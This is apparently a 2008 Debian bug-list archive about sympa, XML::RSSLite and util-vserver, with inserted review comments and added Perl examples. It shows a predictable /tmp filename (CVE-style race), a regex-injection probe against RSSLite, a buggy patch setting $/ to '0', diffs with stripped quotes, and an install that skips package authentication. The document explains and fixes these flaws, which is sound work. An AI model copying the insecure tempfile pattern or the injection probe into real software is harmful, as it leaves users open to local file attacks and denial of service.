Reading state information... Done
Reading extended state information   
Initializing package states... Done
Writing extended state information... Done
Reading task descriptions... Done 


signature.asc
Description: Digital signature


Bug#496520: patch to resolve this

2008-10-04 Thread Micah Anderson
tags 496520 +patch
thanks

Hi,

Attached is a patch to fix this insecure tempfile usage in the code. I
did not make the POD change, as I think that this doesn't qualify as an
RC-exception (this doesn't mean it should not be fixed, just that
justifying this change for a freeze-exception doesn't seem likely).

I am uploading this fix as there is a 0-day NMU policy for RC bugs, and
this has been open for much longer than zero days.

Micah




Bug#501154: sympa: not supported by perl version in Lenny

2008-10-04 Thread Micah Anderson
Package: sympa
Version: 5.3.4-5.2
Severity: grave
Justification: renders package unusable

After installation of sympa, it tries to start the daemons, and the
following errors are printed out for each of the daemons:

Setting up sympa (5.3.4-5.2) ...
Starting Sympa mailing list manager: sympaPrototype mismatch: sub Lock::LOCK_SH 
() vs none at /usr/lib/sympa/bin/Lock.pm line 38.
Constant subroutine LOCK_SH redefined at /usr/lib/sympa/bin/Lock.pm line 38.
Prototype mismatch: sub Lock::LOCK_EX () vs none at /usr/lib/sympa/bin/Lock.pm 
line 39.
Constant subroutine LOCK_EX redefined at /usr/lib/sympa/bin/Lock.pm line 39.
Prototype mismatch: sub Lock::LOCK_NB () vs none at /usr/lib/sympa/bin/Lock.pm 
line 40.
Constant subroutine LOCK_NB redefined at /usr/lib/sympa/bin/Lock.pm line 40.
$* is no longer supported at /usr/lib/sympa/bin/sympa.pl line 162.

I made these go away by commenting out:

#sub LOCK_SH {1};
#sub LOCK_EX {2};
#sub LOCK_NB {4};

in Lock.pm on line 38; I don't know if this causes any problems or not.

The other error:

$* is no longer supported at /usr/lib/sympa/bin/parser.pl line 63.  

 
Is not something I know how to fix, however I believe that this was
deprecated by perl 5.10 as perldoc perlvar says:

   $* Set to a non-zero integer value to do multi-line matching
   within a string, 0 (or undefined) to tell Perl that it can assume that
   strings contain a single line, for the purpose of optimizing pattern
   matches. Pattern matches on strings containing multiple newlines can
   produce confusing results when $* is 0 or undefined. Default is
   undefined. (Mnemonic: * matches multiple things.) This variable
   influences the interpretation of only ^ and $. A literal newline can
   be searched for even when $* == 0.

   Use of $* is deprecated in modern Perl, supplanted by the /s and /m
   modifiers on pattern matching.

   Assigning a non-numerical value to $* triggers a warning (and makes
   $* act if $* == 0), while assigning a numerical value to $* makes
   that an implicit int is applied on the value.

Which makes me think that maybe this should be changed to use the /m
modifier, but I don't know what this particular function in sympa does.

Due to the fact that the four daemons all produce these errors when
sympa is started, and the effects of running code with unsupported
perlisms and unresolved prototype mismatches makes me think that this
version of sympa should not be released with Debian.

Micah

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-vserver-686 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages sympa depends on:
ii  adduser  3.110   add and remove users and groups
ii  debconf [debconf-2.0]1.5.23  Debian configuration management sy
ii  dsyslog [system-log-daemon]  0.4.0   advanced modular syslog daemon
pn  libarchive-zip-perl  none  (no description available)
ii  libc62.7-13  GNU C Library: Shared libraries
pn  libcgi-fast-perl none  (no description available)
pn  libcrypt-ciphersaber-perlnone  (no description available)
ii  libdbd-mysql-perl4.008-1 A Perl5 database interface to the 
ii  libdbi-perl  1.607-1 Perl5 database interface by Tim Bu
ii  libfcgi-perl 0.67-2.1+b1 FastCGI Perl module
pn  libintl-perl none  (no description available)
ii  libio-stringy-perl   2.110-4 Perl modules for IO from scalars a
ii  libmailtools-perl2.04-1  Manipulate email in perl programs
pn  libmd5-perl  none  (no description available)
ii  libmime-perl 5.427-1 transitional dummy package
ii  libmime-tools-perl [libmime- 5.427-1 Perl5 modules for MIME-compliant m
pn  libmsgcat-perl   none  (no description available)
pn  libnet-ldap-perl none  (no description available)
pn  libtemplate-perl none  (no description available)
ii  libxml-libxml-perl   1.66-1+b1   Perl module for using the GNOME li
pn  mhonarc  none  (no description available)
ii  perl [libmime-base64-perl]   5.10.0-15   Larry Wall's Practical Extraction 
pn  perl-suidnone  (no description available)
ii  postfix [mail-transport-agen 2.5.5-1.1   High-performance mail transport ag

Versions of packages sympa recommends:
ii  doc-base  0.8.16 utilities to manage online documen
ii  logrotate 3.7.1-4Log rotation utility

Versions of packages sympa suggests:
ii  apache2-mpm-prefork [httpd]   2.2.9-10   Apache HTTP Server - 

Bug#498144: More information about this bug

2008-10-04 Thread Micah Anderson
-smime.$$ is created
 ## to store the signer certificat for step two. I known, that's durty.
 
+my $temporary_file = /tmp/smime-sender..$$ ;
-my $temporary_file = $Conf{'tmpdir'}./.'smime-sender.'.$$ ;
 my $trusted_ca_options = '';
 $trusted_ca_options = -CAfile $Conf{'cafile'}  if ($Conf{'cafile'});
 $trusted_ca_options .= -CApath $Conf{'capath'}  if ($Conf{'capath'});
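Review bot: this hunk reads backwards: the `+` line introduces the hard-coded `/tmp/smime-sender.$$` path and the `-` line removes the `$Conf{'tmpdir'}` version, the opposite of the insecure-tempfile fix that the changelog entry in this same diff describes, so the diff looks like it was produced new-to-old and should be regenerated before it is applied. Even the intended version, `$Conf{'tmpdir'}.'/smime-sender.'.$$`, is a predictable name: if tmpdir is shared and world-writable a local user can still plant a file or symlink there ahead of the open, so the robust fix is File::Temp's tempfile() (random name, O_EXCL, mode 0600) rather than any name derived from `$$`. The quote characters around both string literals also appear to have been stripped from this copy of the patch.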
diff -u sympa-5.3.4/debian/postinst sympa-5.3.4/debian/postinst
--- sympa-5.3.4/debian/postinst
+++ sympa-5.3.4/debian/postinst
@@ -481,8 +481,4 @@
 db_stop
 
-## Upgrade sympa from previous version(s) if necessary. The upgrade script is smart enough to know 
-## if it needs to do anything or not
-/usr/lib/sympa/bin/sympa.pl --upgrade
-
 ## Other jobs
 #DEBHELPER#
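Review bot: same reversed direction here: the `-` lines remove the `sympa.pl --upgrade` call that the changelog says this upload adds to postinst. When the call is kept, run it only in the `configure` case and only when `$2` (the previously configured version) is non-empty, since a fresh install has nothing to migrate, and let a non-zero exit status fail the postinst rather than masking a broken upgrade; the "smart enough to know" wording in the comment is not a substitute for that check.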
diff -u sympa-5.3.4/debian/changelog sympa-5.3.4/debian/changelog
--- sympa-5.3.4/debian/changelog
+++ sympa-5.3.4/debian/changelog
@@ -1,13 +1,3 @@
-sympa (5.3.4-5.3) unstable; urgency=low
-
-  * Non-maintainer upload.
-  * Fix insecure use of /tmp in sympa scripts by applying upstream
-patch to tools.pl (Closes: #496520)
-  * Add the sympa.pl --upgrade procedure to the debian/postinst 
-to migrate existing installs (Closes: #498144)
-
- -- Micah Anderson [EMAIL PROTECTED]  Sat, 04 Oct 2008 14:03:54 -0400
-
 sympa (5.3.4-5.2) unstable; urgency=low
 
   * Non-maintainer upload.
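Review bot: the changelog hunk is reversed as well (it drops the 5.3.4-5.3 entry), which confirms the whole diff is new-to-old. Once regenerated, the entry should also say that the upgrade step now runs from postinst and under which conditions, so the `Closes: #498144` line can be checked against what the postinst actually does.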


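The insecure temporary file that #496520 is about, as an added example that is not sympa's code or the Debian package's: the PID-derived name the patch touches is shown beside a File::Temp version. The `$tmpdir` argument stands in for sympa's `$Conf{'tmpdir'}`, the PEM text is a constructed placeholder, and `predictable_tempname` and `write_signer_cert` are hypothetical names.

```perl
#!/usr/bin/perl
# Added example, not code from sympa: the predictable temporary file
# from the bug report beside a File::Temp replacement.
use strict;
use warnings;
use File::Temp qw(tempfile);

# Before: the name is built from the PID, so any local user can predict
# it and pre-create a file or symlink at that path before the privileged
# process opens it for writing.  Kept here only for contrast.
sub predictable_tempname {
    my ($tmpdir) = @_;
    return "$tmpdir/smime-sender.$$";
}

# After: tempfile() picks a random name and opens it with O_CREAT|O_EXCL
# and mode 0600, so a pre-planted file or symlink makes the open fail
# instead of being followed.  UNLINK => 1 removes it when the process exits.
sub write_signer_cert {
    my ($tmpdir, $pem) = @_;
    my ($fh, $path) = tempfile('smime-sender.XXXXXXXX', DIR => $tmpdir, UNLINK => 1);
    print {$fh} $pem;
    close $fh or die "close $path: $!";
    return $path;    # hand this to openssl as -certfile / -CAfile
}

if (!caller) {
    my $tmpdir = $ENV{TMPDIR} || '/tmp';    # stands in for $Conf{'tmpdir'}
    # Constructed placeholder, not a real certificate.
    my $pem = "-----BEGIN CERTIFICATE-----\nMIIBplaceholder\n-----END CERTIFICATE-----\n";
    print "old name: ", predictable_tempname($tmpdir), "\n";
    print "new name: ", write_signer_cert($tmpdir, $pem), "\n";
}
```

The point of the change is the open flags, not the directory: O_EXCL makes the kernel refuse a path that already exists, so the race a predictable name invites turns into a visible failure instead of a silent write through an attacker's symlink.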


Bug#496520: Forgot to attach the patch

2008-10-04 Thread Micah Anderson

The patch wasn't attached to the bug, as I previously said it was. I'm
attaching it to this email instead. 

This patch also contains a fix for #498144 (attached to that bug report
as well). 

The upload has been sent to the 5-day delayed queue.

Micah




Bug#501154: Patch adjustment

2008-10-04 Thread Micah Anderson

I've taken David's patch and removed the extraneous bits (substitutions
done because of the build process, etc.), and attached the adjusted diff
to this bug.

Micah
diff -u sympa-5.3.4/src/sympa.pl sympa-5.3.4/src/sympa.pl
--- sympa-5.3.4/src/sympa.pl
+++ sympa-5.3.4/src/sympa.pl
@@ -159,7 +159,7 @@
 
 $log_level = $main::options{'log_level'} if ($main::options{'log_level'}); 
 
-my @parser_param = ($*, $/);
+my @parser_param = ($/);
 my %loop_info;
 my %msgid_table;
 
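Review bot: removing `$*` from `@parser_param` is correct, but a one-element array saved at file scope and restored by hand is fragile; since only `$/` remains, `local $/ = "\n";` inside the function that needs it would scope the change automatically, including on any early-return path where the manual restore is skipped. If the array stays, rename it or comment it so it no longer suggests a pair of parser variables.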
@@ -890,7 +890,7 @@
 	my ($t_listname, $t_robot);
 	
 	# trying to fix a bug (perl bug ??) of solaris version
-	($*, $/) = @parser_param;
+	($/) = @parser_param;
 
 	## test ever if it is an old bad file
 	if ($t_filename =~ /^BAD\-/i){
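Review bot: `($/) = @parser_param;` matches the save above, but the comment "trying to fix a bug (perl bug ??) of solaris version" now describes a workaround whose `$*` half is gone; update it to say what the reset of `$/` is for, or drop the reset together with the comment if nothing depends on it any more.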
diff -u sympa-5.3.4/debian/changelog sympa-5.3.4/debian/changelog
--- sympa-5.3.4/debian/changelog
+++ sympa-5.3.4/debian/changelog
@@ -1,3 +1,10 @@
+sympa (5.3.4-5.3) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * Updating to comply with current versions of Perl (Closes: #501154).
+
+ -- David Moreno Garza [EMAIL PROTECTED]  Sat, 04 Oct 2008 19:47:33 -0400
+
 sympa (5.3.4-5.2) unstable; urgency=low
 
   * Non-maintainer upload.
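Review bot: the changelog entry only says "Updating to comply with current versions of Perl"; the actual changes (dropping `$*` in sympa.pl and parser.pl, adding `()` prototypes to the LOCK_* subs in Lock.pm) should be listed so the entry can be matched to the diff. The version 5.3.4-5.3 is also the number used by the NMU for #496520/#498144 sent to the delayed queue, so one of the two uploads needs renumbering or the two changes need to be merged into one entry.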
only in patch2:
unchanged:
--- sympa-5.3.4.orig/src/Lock.pm
+++ sympa-5.3.4/src/Lock.pm
@@ -35,10 +35,10 @@
 use Fcntl qw(LOCK_SH LOCK_EX LOCK_NB);
 use FileHandle;
 
-sub LOCK_SH {1};
-sub LOCK_EX {2};
-sub LOCK_NB {4};
-sub LOCK_UN {8};
+sub LOCK_SH() {1};
+sub LOCK_EX() {2};
+sub LOCK_NB() {4};
+sub LOCK_UN() {8};
 
 my %list_of_locks;
 my $default_timeout = 60 * 20; ## After this period a lock can be stolen
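Review bot: the `()` prototypes fix the "Prototype mismatch" warning, but the line above already does `use Fcntl qw(LOCK_SH LOCK_EX LOCK_NB)`, so these subs still replace the imported constants and "Constant subroutine LOCK_SH redefined" can still be emitted when warnings are enabled. Delete the four local subs and import LOCK_UN alongside the others (`use Fcntl qw(LOCK_SH LOCK_EX LOCK_NB LOCK_UN);`): Fcntl supplies the values from the system headers, so the hard-coded 1/2/4/8 gain nothing and would be wrong on a platform where they differ.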
only in patch2:
unchanged:
--- sympa-5.3.4.orig/src/parser.pl
+++ sympa-5.3.4/src/parser.pl
@@ -60,8 +60,8 @@
 my ($old_index, $old_data) = ($index, $data);
 my @old_t = @t;
 
-my @old_mode = ($*, $/);
-($*, $/) = (0, \n);
+my @old_mode = ($/);
+($/) = (0, \n);
 
 my $old_desc;
 if (ref($output) eq 'ARRAY') {   
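Review bot: `($/) = (0, "\n");` is a logic error: with `$*` gone the list assignment stores 0 in `$/` and discards the newline, so the input record separator becomes the string "0" for the rest of the parse and every readline in that window splits on a literal 0 instead of on line ends. The original set `$* = 0` and `$/ = "\n"`; the replacement should be `$/ = "\n";` with a matching scalar save (`my $old_mode = $/;`), or simply `local $/ = "\n";`. The quotes around `\n` have also been lost in this copy of the patch.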
@@ -104,6 +104,6 @@
 	select $old_desc;
 }
 
-($*, $/) = @old_mode;
+($/) = @old_mode;
 
 ($index, $data) = ($old_index, $old_data);
 @t = @old_t;
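Review bot: `($/) = @old_mode;` is consistent with the save in the previous hunk, but only as long as `@old_mode` holds exactly the value that was in `$/`; if the save is corrected to a scalar this line must become `$/ = $old_mode;`, and with `local $/` both the save and this restore disappear, which also covers any return between them.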

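The two Perl 5.10 breakages from #501154 (the removed `$*` variable and the redefined LOCK_* constants), as an added example that is not sympa's code: it shows the `/m` modifier doing what `$* = 1` used to do, and the flock() constants imported from Fcntl instead of being redefined as Lock.pm does. The function names and the three-line input are invented for the example.

```perl
#!/usr/bin/perl
# Added example, not code from sympa or the Debian package: the two
# Perl 5.10 problems from the bug report with their fixes side by side.
use strict;
use warnings;
# Import the flock() constants instead of redefining them (the Lock.pm
# problem): Fcntl exports the platform's real values and nothing is redefined.
use Fcntl qw(LOCK_SH LOCK_EX LOCK_NB LOCK_UN);

# The $* problem: 5.10 removed the global multi-line switch, so a pattern
# that relied on "$* = 1" must carry the /m modifier itself.  With /m the
# anchors ^ and $ match at every embedded newline, which is what $* = 1 did.
sub first_word_per_line {
    my ($text) = @_;
    return [ $text =~ /^(\S+)/mg ];
}

# Without /m the anchor only matches at the start of the whole string,
# which is what the old code silently does once $* is gone.
sub first_word_whole_string {
    my ($text) = @_;
    return [ $text =~ /^(\S+)/g ];
}

# Hypothetical helper showing the imported constants in use: a shared,
# non-blocking lock that fails fast instead of waiting for a writer.
sub try_shared_lock {
    my ($path) = @_;
    open(my $fh, '<', $path) or return undef;
    return flock($fh, LOCK_SH | LOCK_NB) ? $fh : undef;
}

if (!caller) {
    my $text = "alpha 1\nbeta 2\ngamma 3\n";    # constructed input
    print "with /m:    ", join(',', @{ first_word_per_line($text) }),     "\n";
    print "without /m: ", join(',', @{ first_word_whole_string($text) }), "\n";
    print "LOCK_SH|LOCK_NB = ", (LOCK_SH | LOCK_NB), "\n";
    if (my $fh = try_shared_lock($0)) {
        print "shared lock on $0 acquired\n";
        flock($fh, LOCK_UN);
        close $fh;
    }
}
```

Run it as a script to see the two match results differ; the first prints all three words, the second only the first. That difference is why the `$*` removal cannot be fixed by deleting the variable alone: any pattern that depended on it needs `/m` added, which is what the perlvar text quoted in the report recommends.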


Bug#498671: This is not a bug

2008-10-04 Thread Micah Anderson

This isn't a bug at all; all the reasons cited aren't actually bugs.

 (1) It seems abandoned upstream — the last update is Feb 2003 according
 to CPAN.

That's not a bug, and doesn't make this package RC.

 (2) bug 443629 (CDATA handling) makes it useles for a large number of
 feeds, and worse even feeds that work now may break at any time — CDATA
 is standard XML, after all.

Each bug stands on its own. Don't file another bug to point at some
other bug. 

 (3) bug 443629 is not just a CDATA problem. Its actually a
 nearly-arbitrary regexp injection. e.g.,
f(?2)o{hello}/f(?2)o
 gives
   Reference to nonexistent group in regex; marked by -- HERE in
   m/f(?2) -- HERE o/ at /usr/share/perl5/XML/RSSLite.pm line 266.
 Thankfully, { and } are changed to spaces, so (?{code}) is not
 possible, so its probably just a DoS attack (e.g., via exponential time
 regexp).

See above.

 (4) libxml-rsslite-perl has no reverse dependencies in lenny or sid.

 (5) popcon data:

Not really a bug either.

 Overall, the module isn't very widely used, is of questionable quality,
 is probably a security issue, is abandoned upstream, and I suggest
 doesn't belong in lenny.

If you wanted to file a removal request, that should be done another
way, you've filed a bug that doesn't actually report any bug at
all. Please do file an actual security bug, if there is one, but
'probably a security bug' isn't strong enough to file a bug. 

I'm closing this bug; feel free to open an RM request if you feel that's
the correct way to go.

Micah


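The regex injection that the #498671 report describes in XML::RSSLite, as an added example that is not RSSLite's code: a tag name read from the feed is interpolated into a pattern raw, and then with `\Q...\E`. The feed fragment is constructed around the reporter's `f(?2)o` probe; `extract_unsafe` and `extract_safe` are hypothetical names.

```perl
#!/usr/bin/perl
# Added example, not XML::RSSLite's code: a tag name taken from the feed
# interpolated into a regex raw, beside the quotemeta (\Q...\E) version.
use strict;
use warnings;

# Constructed feed fragment using the reporter's f(?2)o probe as the element name.
my $FEED = '<f(?2)o>{hello}</f(?2)o>';

# Unsafe: every regex metacharacter in $tag is compiled into the pattern.
# "(?2)" is a recursion into group 2, which does not exist, so the match
# dies at runtime with "Reference to nonexistent group"; other inputs can
# instead compile into patterns that backtrack for a very long time, which
# is the denial-of-service angle the report mentions.
sub extract_unsafe {
    my ($xml, $tag) = @_;
    return $xml =~ /<$tag>(.*?)<\/$tag>/s ? $1 : undef;
}

# Safe: \Q...\E escapes the interpolated text, so the tag name can only
# match itself, whatever it contains.
sub extract_safe {
    my ($xml, $tag) = @_;
    return $xml =~ /<\Q$tag\E>(.*?)<\/\Q$tag\E>/s ? $1 : undef;
}

if (!caller) {
    for my $tag ('f(?2)o', 'title') {
        my $unsafe = eval { extract_unsafe($FEED, $tag) };
        my $err    = $@ ? 'died: ' . (split /\n/, $@)[0] : '';
        my $safe   = extract_safe($FEED, $tag);
        printf "%-8s unsafe=%s  safe=%s\n", $tag,
            $err || (defined $unsafe ? $unsafe : 'no match'),
            defined $safe ? $safe : 'no match';
    }
}
```

For `f(?2)o` the unsafe version dies with the same "Reference to nonexistent group" message the reporter saw, while the escaped version returns `{hello}`; for a plain `title` tag both simply report no match. The rule is the usual one: anything that came out of the input goes through `\Q...\E` (or `quotemeta`) before it is used as a pattern.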


Bug#496624: util-vserver: missing dependency : schedutils (for ionice)

2008-08-26 Thread Micah Anderson
Hi,

* kaouete [EMAIL PROTECTED] [2008-08-26 01:40-0400]:

 Justification: no longer builds from source

Can you provide a build log showing this?


 It looks like the ionice binary is needed by the configure script.
 It is included in the schedutils package which is not a dependency of
 util-vserver.

There is no such package called 'schedutils', ionice is included in
util-linux. 

micah




Bug#496624: util-vserver: missing dependency : schedutils (for ionice)

2008-08-26 Thread Micah Anderson
* Victor NOEL [EMAIL PROTECTED] [2008-08-26 07:22-0400]:
   It looks like the ionice binary is needed by the configure script.
   It is included in the schedutils package which is not a dependency of
   util-vserver.
  
  There is no such package called 'schedutils', ionice is included in
  util-linux. 
 
 Like someone else said : I am on etch, so I guess this is the
 reason why it did not work.

Yes, you will need to adjust the build-dependencies to make it build
properly on etch.

 If it is in util-linux and this package is a dependency of
 util-vserver, I guess this bug report should be closed :)

I'm closing it, thanks.

 Maybe the depends field can specify a minimum version of 
 util-linux that contains ionice ?

This is not possible to do in etch, you maybe would prefer to wait
until the package is available in backports.org.

 Next time I will check the dependencies more thoroughly :)

No problem,
micah




Bug#484479: Fails to start vservers (capget(): Invalid argument)

2008-06-04 Thread Micah Anderson
Hi,

Thanks for your bug report.

 some upgrade of util-vserver made all attempts to start vserver fail
 with:
 
 # vserver pmademo start
 capget(): Invalid argument
 capabilities are not enabled in kernel-setup
 
 Downgrading back to 0.30.214-6 the problem is gone (this is latest
 amd64 binary I found on snapshots.debian.net), but if I rebuild this
 version from source, I get exactly the same error, so the problem might be
 actually caused by some statically linked code.

It seems like the buildds created the binaries against too new kernel
headers that have the newest API and util-vserver doesn't support
those. This is any kernel headers newer than 2.6.25.

These typically are in /usr/include/linux and are from the package
linux-libc-dev which currently is shipping at version 2.6.25-4.

This is a problem because we don't have alternative headers available
for previous kernels so that I can do a build-dep, and util-vserver is
happily building against headers that it can't support. 

The util-vserver trunk can build against the newer headers, so maybe we
can pull from there to resolve this.

micah





Bug#484479: Fails to start vservers (capget(): Invalid argument)

2008-06-04 Thread Micah Anderson
* Micah Anderson [EMAIL PROTECTED] [2008-06-04 13:08-0400]:

 The util-vserver trunk can build against the newer headers, so maybe we
 can pull from there to resolve this.

Hi,

I've applied a patch from upstream that I hope will solve this. Can
you try this on your machine and let me know the results?

You can pull the deb from:

http://people.debian.org/~micah/util-vserver

or if you would prefer to build it, you can get everything there, or
pull it from svn and build it:

svn co svn+ssh://svn.debian.org/svn/pkg-vserver/util-vserver/trunk

I do not have an amd64 machine to test this, so your help would be
appreciated!

Thanks,
Micah





Bug#484479: Fails to start vservers (capget(): Invalid argument)

2008-06-04 Thread Micah Anderson
* Michal Čihař [EMAIL PROTECTED] [2008-06-04 11:09-0400]:
 Hi
 
 On Wed, 4 Jun 2008 13:39:25 -0400
 Micah Anderson [EMAIL PROTECTED] wrote:
 
  I've applied a patch from upstream that I hope will solve this. Can
  you try this on your machine and let me know the results?
  
  You can pull the deb from:
  
  http://people.debian.org/~micah/util-vserver
  
  or if you would prefer to build it, you can get everything there, or
  pull it from svn and build it:
  
  svn co svn+ssh://svn.debian.org/svn/pkg-vserver/util-vserver/trunk
  
  I do not have an amd64 machine to test this, so your help would be
  appreciated!
 
 Sorry, but nothing has changed, still same error and behavior. ...
 After quick look at source package ... Because added patch is not being
 applied ;-). After fixing debian/patches/00list package works fine.
 Thanks for finding the patch.

Haha, oops. 

Thanks for testing and finding that. I'll add it to 00list and upload
now.

Micah






Bug#477392: cupsys tries to overwrite /usr/lib/cups/daemon/cups-lpd which is also in package cupsys-bsd

2008-04-22 Thread Micah Anderson
Package: cupsys
Version: 1.3.7-1
Severity: serious

Doing an apt-get dist-upgrade today gave me this:

Unpacking replacement cupsys ...
dpkg: error processing /var/cache/apt/archives/cupsys_1.3.7-4_i386.deb
(--unpack): trying to overwrite `/usr/lib/cups/daemon/cups-lpd', which is also 
in package cupsys-bsd
 dpkg-deb: subprocess paste killed by signal (Broken pipe)
 Starting Common Unix Printing System: cupsd.


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-vserver-686 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages cupsys depends on:
ii  adduser   3.107  add and remove users and groups
ii  cupsys-common 1.3.7-1Common UNIX Printing System(tm) - 
ii  debconf [debconf-2.0] 1.5.21 Debian configuration management sy
ii  ghostscript   8.62.dfsg.1-2  The GPL Ghostscript PostScript/PDF
ii  ghostscript-x [gs-esp 8.62.dfsg.1-2  The GPL Ghostscript PostScript/PDF
ii  gs-esp8.62.dfsg.1-2  Transitional package
ii  libavahi-compat-libdn 0.6.22-3   Avahi Apple Bonjour compatibility 
ii  libc6 2.7-10 GNU C Library: Shared libraries
ii  libcupsimage2 1.3.7-1Common UNIX Printing System(tm) - 
ii  libcupsys21.3.7-1Common UNIX Printing System(tm) - 
ii  libdbus-1-3   1.2.1-1simple interprocess messaging syst
ii  libgnutls26   2.2.2-1the GNU TLS library - runtime libr
ii  libkrb53  1.6.dfsg.3~beta1-4 MIT Kerberos runtime libraries
ii  libldap-2.4-2 2.4.7-6.2  OpenLDAP libraries
ii  libpam0g  0.99.7.1-6 Pluggable Authentication Modules l
ii  libpaper1 1.1.23 library for handling paper charact
ii  libslp1   1.2.1-7.2  OpenSLP libraries
ii  lsb-base  3.2-10 Linux Standard Base 3.2 init scrip
ii  perl-modules  5.8.8-12   Core Perl modules
ii  procps1:3.2.7-8  /proc file system utilities
ii  ssl-cert  1.0.18 simple debconf wrapper for OpenSSL
ii  xpdf-utils [poppler-u 3.02-1.3   Portable Document Format (PDF) sui

Versions of packages cupsys recommends:
ii  avahi-utils 0.6.22-3 Avahi browsing, publishing and dis
ii  cupsys-client   1.3.7-1  Common UNIX Printing System(tm) - 
ii  foomatic-filters3.0.2-20080211-3 OpenPrinting printer support - fil
ii  smbclient   1:3.0.28a-2  a LanManager-like simple client fo

-- debconf information:
  cupsys/raw-print: true
  cupsys/backend: ipp, lpd, parallel, scsi, serial, socket, usb, snmp, dnssd



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#456996: Please send some info

2008-04-11 Thread Micah Anderson
Hi,

* intrigeri [EMAIL PROTECTED] [2008-04-08 03:09-0400]:

 When I upgraded a lenny system from 0.30.214-6 to 0.30.215-2, all my
 VServers were restarted without any warning.

Yes, this is because of the postrm in 0.30.214-6 stopping the
vservers. This actually has been fixed, but if you had 0.30.214-6
installed, any upgrade to a newer version would cause this
behavior. That package's postrm is broken and when you upgrade to a new
package, that broken postrm is executed. Sadly, I could not fix the
package that you actually have installed, but instead must provide you
with a new package that has the fix, but you will experience the problem
when you transition to the fixed package.

I can demonstrate as follows:

1. As you did, I have version 0.30.214-6 installed:

# apt-cache policy util-vserver
util-vserver:
  Installed: 0.30.214-6
  Candidate: 0.30.215-2

2. I have a vserver running:

# vserver-stat
CTX   PROCVSZRSS  userTIME   sysTIMEUPTIME NAME
44   3   8.6M   2.6M   0m00s56   0m00s44   0m02s63 etch

3. I install util-vserver version 0.30.215-1 (using snapshot.d.n), and
it will stop my running vserver, just as you experienced:

# apt-get install util-vserver=0.30.215-1
Reading package lists... Done
Building dependency tree   
Reading state information... Done
Suggested packages:
  yum
The following packages will be upgraded:
  util-vserver
1 upgraded, 0 newly installed, 0 to remove and 253 not upgraded.
Need to get 513kB of archives.
After this operation, 147kB of additional disk space will be used.
WARNING: The following packages cannot be authenticated!
  util-vserver
Install these packages without verification [y/N]? y
Get:1 http://snapshot.debian.net pool/util-vserver util-vserver 0.30.215-1 
[513kB]
Fetched 513kB in 3s (146kB/s)
Preconfiguring packages ...
(Reading database ... 265970 files and directories currently installed.)
Preparing to replace util-vserver 0.30.214-6 (using
.../util-vserver_0.30.215-1_i386.deb) ...
Stopping vservers of type 'default'
Stopping all running Linux-VServer guests...
Stopping etch: done
Unpacking replacement util-vserver ...
Setting up util-vserver (0.30.215-1) ...
Fixing visibility of /proc entries for Linux-VServer guests...done.
Starting Linux-VServers in background
# vserver-stat
CTX   PROCVSZRSS  userTIME   sysTIMEUPTIME NAME
(nothing here).

4. Now I start the vserver again so that I can demonstrate that it will
not be stopped when I install 0.30.215-2:

# vserver etch start
Starting system log daemon: syslogd.
Starting kernel log daemon: klogd.
Not starting internet superserver: no services enabled.
Starting OpenBSD Secure Shell server: sshd.
Starting periodic command scheduler: crond.
#

5. I install util-vserver=0.30.215-2, where you will see that the
vserver is *not* stopped, thus the problem was actually fixed:

# apt-get install util-vserver=0.30.215-2
Reading package lists... Done
Building dependency tree
Reading state information... Done
Suggested packages:
  yum
The following packages will be upgraded:
  util-vserver
1 upgraded, 0 newly installed, 0 to remove and 253 not upgraded.
Need to get 513kB of archives.
After this operation, 0B of additional disk space will be used.
Get:1 ftp://debian.csail.mit.edu sid/main util-vserver 0.30.215-2
[513kB]
Fetched 513kB in 1s (407kB/s) 
Preconfiguring packages ...
(Reading database ... 265996 files and directories currently installed.)
Preparing to replace util-vserver 0.30.215-1 (using
.../util-vserver_0.30.215-2_i386.deb) ...
Unpacking replacement util-vserver ...
Setting up util-vserver (0.30.215-2) ...
Fixing visibility of /proc entries for Linux-VServer guests...done.
Starting Linux-VServers in background

6. Et voilà, the vserver is still running:

# vserver-stat
CTX   PROCVSZRSS  userTIME   sysTIMEUPTIME NAME
44   3   8.6M   2.6M   0m00s10   0m00s36   2m32s36 etch

Does that make sense?

Micah




Bug#456996: Please send some info

2008-03-18 Thread Micah Anderson
* Kurt Roeckx [EMAIL PROTECTED] [2008-03-17 16:51-0400]:
 On Mon, Mar 17, 2008 at 12:41:38PM -0400, Micah Anderson wrote:
  tag 456996 +moreinfo
  thanks
  
  Hi,
  
  I'm trying to track down how this happened for you, can you please
  provide the following:
 
 If you want to reach me, it helps to send a mail to me.  I just noticed
 that you closed it so I went looking at the bug log.
 
  1. the contents of your /etc/default/util-vserver 
  2. the debconf value for util-vserver/prerm_stop_running_vservers
   3. the debconf value for util-vserver/start_on_boot
  
  I have not been able to replicate this yet, it may have been fixed in
  -6, I've tried setting these to all possible combinations, but I suppose
  I may have missed something.
 
 I guess you have been able to reproduce now?  Do I still need to do
 anything?

I was able to finally reproduce it, no need to do anything, except
install the new version to see if it solves the problem for you.

Micah





Bug#456996: Please send some info

2008-03-18 Thread Micah Anderson
tag 456996 +moreinfo
thanks

Hi,

I'm trying to track down how this happened for you, can you please
provide the following:

1. the contents of your /etc/default/util-vserver 
2. the debconf value for util-vserver/prerm_stop_running_vservers
3. the debconf value for util-vserver/start_on_boot

I have not been able to replicate this yet, it may have been fixed in
-6, I've tried setting these to all possible combinations, but I suppose
I may have missed something.

Thanks,
Micah





Bug#429177: I will upload this for you

2007-11-14 Thread Micah Anderson

Due to the security nature of this fix (resolves 3 CVEs), I am going to
upload this to the archive for you. I've changed the severity to high
and will upload the package immediately, please use severity 'high' on
all future security uploads.

In the future its probably best if there is a security issue in the
package to ask someone in the debian testing team to sponsor your upload
if you cannot.

 So that just leaves lenny, and it might be quicker just to wait the 10 
 days for it to be promoted from sid to lenny, than to do the work of 
 backporting the XSS fix to 1.2.3.

Lenny doesn't matter right now as part of security. This is not a remote 
